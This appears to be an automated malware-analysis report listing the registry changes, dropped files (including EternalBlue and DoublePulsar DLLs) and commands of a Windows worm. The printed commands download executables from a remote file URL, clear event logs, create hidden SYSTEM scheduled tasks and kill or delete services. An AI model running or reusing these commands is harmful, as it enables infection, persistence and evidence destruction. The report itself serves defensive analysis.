Technical Information
- [<HKLM>\System\CurrentControlSet\Services\MicrosotMaims] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\MicrosotMaims] 'ImagePath' = '%WINDIR%\Fonts\svchost.exe'
- [<HKLM>\System\CurrentControlSet\Services\MicrosoftMysql] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\MicrosoftMysql] 'ImagePath' = '%WINDIR%\Fonts\Mysql\svchost.exe'
- '<SYSTEM32>\taskkill.exe' /F /im sqlserver.exe
- '<SYSTEM32>\net.exe' stop NetPipAtcivator
- '<SYSTEM32>\net.exe' stop WetPipAtcivator
- '<SYSTEM32>\net.exe' stop SetPipAtcivator
- '<SYSTEM32>\net.exe' stop MetPipAtcivator
- '%WINDIR%\syswow64\net.exe' stop MicrosotMaims
- '<SYSTEM32>\net.exe' stop EvemsWindows
- '<SYSTEM32>\net.exe' stop Evemsarver
- '%WINDIR%\syswow64\net.exe' stop MicrosotMais
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\net.exe' stop "MicrosoftMysql"
- '%WINDIR%\syswow64\net.exe' stop "MicrosoftMssql"
- '%WINDIR%\syswow64\net.exe' stop SharedAccess
- '%WINDIR%\syswow64\taskkill.exe' /f /im mance.exe
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0
- '<SYSTEM32>\net.exe' stop Samsorver
- '<SYSTEM32>\taskkill.exe' /f /t /im dl1hots.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im d1lhots.exe
- '<SYSTEM32>\taskkill.exe' /F /im sqlservr.exe
- '<SYSTEM32>\taskkill.exe' /F /im WUDFhosts.exe
- '<SYSTEM32>\taskkill.exe' /F /im TrustedInsteller.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im sqlserver.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im FTP.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im powershell.exe
- '<SYSTEM32>\taskkill.exe' /F /im powershell.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im wscript.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im rundlls.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im dlllhost.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im KvMonXP.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im dllhots.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im d11hots.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im dlIhost.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im rundllhost.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Eter.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im puls.exe
- %TEMP%\9358.tmp\kk.bat
- %WINDIR%\fonts\mysql\loab.bat
- %WINDIR%\fonts\mysql\load.bat
- %WINDIR%\fonts\mysql\mance.exe
- %WINDIR%\fonts\mysql\mance.xml
- %WINDIR%\fonts\mysql\nanshou.dll
- %WINDIR%\fonts\mysql\p.txt
- %WINDIR%\fonts\mysql\poab.bat
- %WINDIR%\fonts\mysql\poad.bat
- %WINDIR%\fonts\mysql\posh-0.dll
- %WINDIR%\fonts\mysql\puls.exe
- %WINDIR%\fonts\mysql\puls.xml
- %WINDIR%\fonts\mysql\ssleay32.dll
- %WINDIR%\fonts\mysql\svchost.exe
- %WINDIR%\fonts\mysql\taskhost.exe
- %WINDIR%\fonts\mysql\tibe-2.dll
- %WINDIR%\fonts\mysql\tich-1.dll
- %WINDIR%\fonts\mysql\trch-1.dll
- %WINDIR%\fonts\mysql\trfo-2.dll
- %WINDIR%\fonts\mysql\tucl-1.dll
- %WINDIR%\fonts\mysql\tufo-2.dll
- %WINDIR%\fonts\mysql\ucl.dll
- %WINDIR%\fonts\mysql\wget.exe
- %WINDIR%\fonts\mysql\xdvl-0.dll
- %WINDIR%\fonts\mysql\libxml2.dll
- %WINDIR%\fonts\mysql\zlib1.dll
- %WINDIR%\fonts\mysql\libeay32.dll
- %WINDIR%\fonts\mysql\eter.xml
- <Current directory>\xxoo.vbs
- %WINDIR%\inf\50.exe
- %WINDIR%\fonts\svchost.exe
- %WINDIR%\fonts\conhost.exe
- %WINDIR%\inf\tem.vbs
- %WINDIR%\inf\445.exe
- %TEMP%\xsfxdel~.exe
- %WINDIR%\fonts\mysql\ctfmon.exe
- %WINDIR%\fonts\mysql\doublepulsar.dll
- %WINDIR%\fonts\mysql\doublepulsar2.dll
- %WINDIR%\fonts\mysql\eternalblue.dll
- %WINDIR%\fonts\mysql\eternalblue2.dll
- %WINDIR%\fonts\mysql\file.txt
- %WINDIR%\fonts\mysql\nei.bat
- %WINDIR%\fonts\mysql\wai.bat
- %WINDIR%\fonts\mysql\same.bat
- %WINDIR%\fonts\mysql\bat.bat
- %WINDIR%\fonts\mysql\cmd.bat
- %WINDIR%\fonts\mysql\cnli-1.dll
- %WINDIR%\fonts\mysql\coli-0.dll
- %WINDIR%\fonts\mysql\crli-0.dll
- %WINDIR%\fonts\mysql\dmgd-4.dll
- %WINDIR%\fonts\mysql\eter.exe
- %WINDIR%\fonts\mysql\exma-1.dll
- nul
- %WINDIR%\fonts\conhost.exe
- %WINDIR%\fonts\svchost.exe
- %WINDIR%\inf\tem.vbs
- %WINDIR%\fonts\mysql\ctfmon.exe
- %WINDIR%\fonts\mysql\doublepulsar.dll
- %WINDIR%\fonts\mysql\doublepulsar2.dll
- %WINDIR%\fonts\mysql\eternalblue.dll
- %WINDIR%\fonts\mysql\eternalblue2.dll
- %WINDIR%\fonts\mysql\file.txt
- <Current directory>\xxoo.vbs
- %WINDIR%\inf\50.exe
- %WINDIR%\inf\tem.vbs
- %WINDIR%\fonts\mysql\file.txt
- %WINDIR%\fonts\mysql\doublepulsar.dll
- %WINDIR%\fonts\mysql\doublepulsar2.dll
- %WINDIR%\fonts\mysql\eternalblue.dll
- %WINDIR%\fonts\mysql\eternalblue2.dll
- %WINDIR%\inf\445.exe
- <Current directory>\xxoo.vbs
- http://no##.youdao.com/yws/api/personal/file/WEBb7c8f451dbb9385d84828b45f97fd7ae?me###################################################################
- http://no##.youdao.com/yws/api/personal/file/WEB307a0cc7e244dab376576c72912aa7d4?me###################################################################
- DNS ASK no##.youdao.com
- ClassName: '' WindowName: ''
- '%WINDIR%\fonts\mysql\svchost.exe'
- '%WINDIR%\fonts\mysql\svchost.exe' start "MicrosoftMysql"
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims DisplayName Network Location Service
- '%WINDIR%\fonts\svchost.exe' start MicrosotMaims
- '%WINDIR%\fonts\svchost.exe' install MicrosotMaims %WINDIR%\Fonts\conhost.exe
- '%WINDIR%\inf\445.exe'
- '%WINDIR%\fonts\mysql\ctfmon.exe'
- '%WINDIR%\fonts\mysql\svchost.exe' install MicrosoftMysql "%WINDIR%\Fonts\Mysql\cmd.bat"
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\inf\tem.vbs"
- '%WINDIR%\fonts\mysql\svchost.exe' stop "MicrosoftFonts"
- '%WINDIR%\fonts\mysql\svchost.exe' stop "MicrosoftMysql"
- '%WINDIR%\fonts\mysql\svchost.exe' install MicrosoftMysql %WINDIR%\Fonts\Mysql\cmd.bat
- '%WINDIR%\fonts\mysql\svchost.exe' install "MicrosoftMysql" %WINDIR%\Fonts\Mysql\cmd.bat
- '%WINDIR%\inf\50.exe'
- '%TEMP%\xsfxdel~.exe' "%WINDIR%\inf\445.exe"
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims Description Provides performance library information from Windows Management.
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1' (with hidden window)
- '%TEMP%\xsfxdel~.exe' "%WINDIR%\inf\445.exe"' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims Description Provides performance library information from Windows Management.' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Fonts\Mysql\same.bat" "' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims DisplayName Network Location Service' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' install MicrosotMaims %WINDIR%\Fonts\conhost.exe' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMais' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop MicrosotMais' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMaims' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop MicrosotMaims' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' start MicrosotMaims' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\9358.tmp\KK.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\9358.tmp\KK.bat" "
- '<SYSTEM32>\sc.exe' delete WetPipAtcivator
- '<SYSTEM32>\net1.exe' stop SetPipAtcivator
- '<SYSTEM32>\sc.exe' delete SetPipAtcivator
- '<SYSTEM32>\net1.exe' stop MetPipAtcivator
- '<SYSTEM32>\sc.exe' delete MetPipAtcivator
- '<SYSTEM32>\net1.exe' stop NetPipAtcivator
- '<SYSTEM32>\cscript.exe' xxoo.vbs "http://no##.youdao.com/yws/api/personal/file/WEBb7c8f451dbb9385d84828b45f97fd7ae?me###################################################################" %WINDIR%\inf\50.exe
- '<SYSTEM32>\net1.exe' stop WetPipAtcivator
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMaims
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1
- '%WINDIR%\syswow64\attrib.exe' -s -h -r -a %WINDIR%\Fonts
- '%WINDIR%\syswow64\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts
- '%WINDIR%\syswow64\net1.exe' stop MicrosotMais
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMais
- '<SYSTEM32>\sc.exe' delete NetPipAtcivator
- '<SYSTEM32>\sc.exe' delete Evemsarver
- '<SYSTEM32>\net1.exe' stop Evemsarver
- '<SYSTEM32>\sc.exe' stop ServiceMais
- '<SYSTEM32>\sc.exe' delete ServiceMais
- '<SYSTEM32>\sc.exe' stop ServiceMaims
- '<SYSTEM32>\sc.exe' delete ServiceMaims
- '<SYSTEM32>\sc.exe' stop NetPipeAtcivator
- '<SYSTEM32>\sc.exe' delete NetPipeAtcivator
- '<SYSTEM32>\sc.exe' stop ServiceSais
- '<SYSTEM32>\sc.exe' stop FormManger
- '<SYSTEM32>\sc.exe' stop Famserver
- '<SYSTEM32>\sc.exe' delete Famserver
- '<SYSTEM32>\sc.exe' stop Microsarver
- '<SYSTEM32>\sc.exe' delete Microsarver
- '<SYSTEM32>\net1.exe' stop Samsorver
- '<SYSTEM32>\sc.exe' delete Samsorver
- '<SYSTEM32>\net1.exe' stop EvemsWindows
- '<SYSTEM32>\sc.exe' delete FormManger
- '<SYSTEM32>\sc.exe' delete EvemsWindows
- '<SYSTEM32>\sc.exe' delete ServiceSaims
- '<SYSTEM32>\sc.exe' delete ServiceSais
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.0
- '<SYSTEM32>\cscript.exe' xxoo.vbs "http://no##.youdao.com/yws/api/personal/file/WEB307a0cc7e244dab376576c72912aa7d4?me###################################################################" %WINDIR%\inf\445.exe
- '%WINDIR%\syswow64\net1.exe' stop SharedAccess
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
- '%WINDIR%\syswow64\schtasks.exe' /create /TN "At1" /TR "%WINDIR%\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM
- '%WINDIR%\syswow64\schtasks.exe' /create /TN "At2" /TR "%WINDIR%\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
- '%WINDIR%\syswow64\attrib.exe' +h +s -r %WINDIR%\tasks\At*.job
- '%WINDIR%\syswow64\attrib.exe' +h +s -r <SYSTEM32>\Tasks\At*
- '%WINDIR%\syswow64\net.exe' start "MicrosoftMysql"
- '%WINDIR%\syswow64\net1.exe' start "MicrosoftMysql"
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At1.job /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At2.job /c /e /t /g everyone:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At1 /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At2 /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At1 /c /e /t /g everyone:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At2 /c /e /t /g everyone:F
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Tasks\MiscfostNsi /p system:n
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At2.job /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At1.job /c /e /t /g everyone:F
- '%WINDIR%\syswow64\net1.exe' start lanmanserver
- '%WINDIR%\syswow64\net1.exe' start lanmanworkstation
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\dlllhost.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Fonts\Mysql\same.bat" "
- '%WINDIR%\syswow64\net1.exe' stop "MicrosoftMysql"
- '%WINDIR%\syswow64\net1.exe' stop "MicrosoftMssql"
- '%WINDIR%\syswow64\sc.exe' delete "MicrosoftMysql"
- '%WINDIR%\syswow64\sc.exe' delete "MicrosoftMssql"
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 20
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Fonts\Mysql\cmd.bat" "
- '%WINDIR%\syswow64\mode.com' con cols=50 lines=40
- '%WINDIR%\syswow64\sc.exe' config Browser start= auto
- '%WINDIR%\syswow64\sc.exe' config lanmanworkstation start= auto
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= auto
- '%WINDIR%\syswow64\sc.exe' config SharedAccess start= disabled
- '%WINDIR%\syswow64\net.exe' start Browser
- '%WINDIR%\syswow64\net1.exe' start Browser
- '%WINDIR%\syswow64\net.exe' start lanmanworkstation
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\net1.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\net1.exe' stop MicrosotMaims
- '<SYSTEM32>\sc.exe' stop ServiceSaims
- '<SYSTEM32>\sc.exe' delete MicrosotSaims
- '<SYSTEM32>\sc.exe' stop MicrosotSaims
- '<SYSTEM32>\sc.exe' stop SQLWriter$
- '<SYSTEM32>\sc.exe' delete SQLWriter$
- '<SYSTEM32>\sc.exe' stop Java_update
- '<SYSTEM32>\sc.exe' delete Java_update
- '<SYSTEM32>\sc.exe' stop Microsoftmyssql
- '<SYSTEM32>\sc.exe' delete TlntSvr
- '<SYSTEM32>\sc.exe' delete Microsoftmyssql
- '<SYSTEM32>\sc.exe' delete cftmon
- '<SYSTEM32>\sc.exe' delete KuGouMusic
- '<SYSTEM32>\sc.exe' delete WinHelpSvcs
- '<SYSTEM32>\sc.exe' stop Networks
- '<SYSTEM32>\sc.exe' delete Networks
- '<SYSTEM32>\sc.exe' stop MicrosoftWServertime
- '<SYSTEM32>\sc.exe' delete MicrosoftWServertime
- '<SYSTEM32>\sc.exe' stop KuGouMusic
- '<SYSTEM32>\sc.exe' stop TlntSvr
- '<SYSTEM32>\sc.exe' stop WinHelpSvcs
- '<SYSTEM32>\sc.exe' delete WiredService
- '<SYSTEM32>\sc.exe' stop WiredService
- '<SYSTEM32>\wevtutil.exe' cl "windows powershell"
- '<SYSTEM32>\wevtutil.exe' cl "system"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Debug\sqlserver.exe /d everyone
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Debug /d everyone
- '<SYSTEM32>\cacls.exe' %WINDIR%\Cursors /d everyone
- '<SYSTEM32>\cacls.exe' %PROGRAMDATA%\Microsoft\svchost.exe /d everyone
- '<SYSTEM32>\cacls.exe' %PROGRAMDATA% /d everyone
- '<SYSTEM32>\wevtutil.exe' cl "security"
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\mysql /p everyone:F
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\dl1hots.exe /p everyone:F
- '<SYSTEM32>\cacls.exe' %WINDIR%\conhost\conhost.exe /d everyone
- '<SYSTEM32>\sc.exe' stop sql
- '<SYSTEM32>\sc.exe' delete sql
- '<SYSTEM32>\sc.exe' stop Networks20181019
- '<SYSTEM32>\sc.exe' delete Networks20181019
- '<SYSTEM32>\sc.exe' stop MSSQLSERVER$
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\sqlservr.exe /d everyone
- '<SYSTEM32>\sc.exe' delete MSSQLSERVER$
- '<SYSTEM32>\sc.exe' stop cftmon
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Debuger /d everyone
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\csrss.exe
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\rundllhost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\dlllhost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\conhost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\svchost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\csrss.exe" /g everyone:f
- '<SYSTEM32>\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
- '<SYSTEM32>\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Fonts\\svchost.exe'" call Terminate
- '<SYSTEM32>\wbem\wmic.exe' process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
- '<SYSTEM32>\wbem\wmic.exe' process where "name='lsass.exe' and ExecutablePath='C:\\Windows\\Fonts\\lsass.exe'" call Terminate
- '<SYSTEM32>\sc.exe' stop MicrosotMais
- '<SYSTEM32>\sc.exe' delete MicrosotMais
- '<SYSTEM32>\sc.exe' stop MicrosotMaims
- '<SYSTEM32>\sc.exe' delete MicrosotMaims
- '<SYSTEM32>\sc.exe' stop MicrosotSais
- '<SYSTEM32>\sc.exe' delete MicrosotSais
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\svchost.exe
- '<SYSTEM32>\sc.exe' stop HostManger
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\rundlls.exe" /g everyone:f
- '%WINDIR%\syswow64\net.exe' start lanmanserver
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Tasks\HomeGroupProvider /p system:n
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\rundllhost.exe
- '<SYSTEM32>\sc.exe' stop SERVERTIMEl
- '<SYSTEM32>\sc.exe' delete SERVERTIMEl
- '<SYSTEM32>\sc.exe' stop SERVERTIME
- '<SYSTEM32>\sc.exe' delete SERVERTIME
- '<SYSTEM32>\sc.exe' stop Hostserver
- '<SYSTEM32>\sc.exe' delete Hostserver
- '<SYSTEM32>\sc.exe' stop ServicesMain
- '<SYSTEM32>\sc.exe' delete HostManger
- '<SYSTEM32>\sc.exe' delete ServicesMain
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\rundlls.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\rundllhost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\dlllhost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\conhost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\svchost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\csrss.exe /a
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\rundlls.exe
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\fonts /a
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\conhost.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Tasks\WwANsvc /p system:n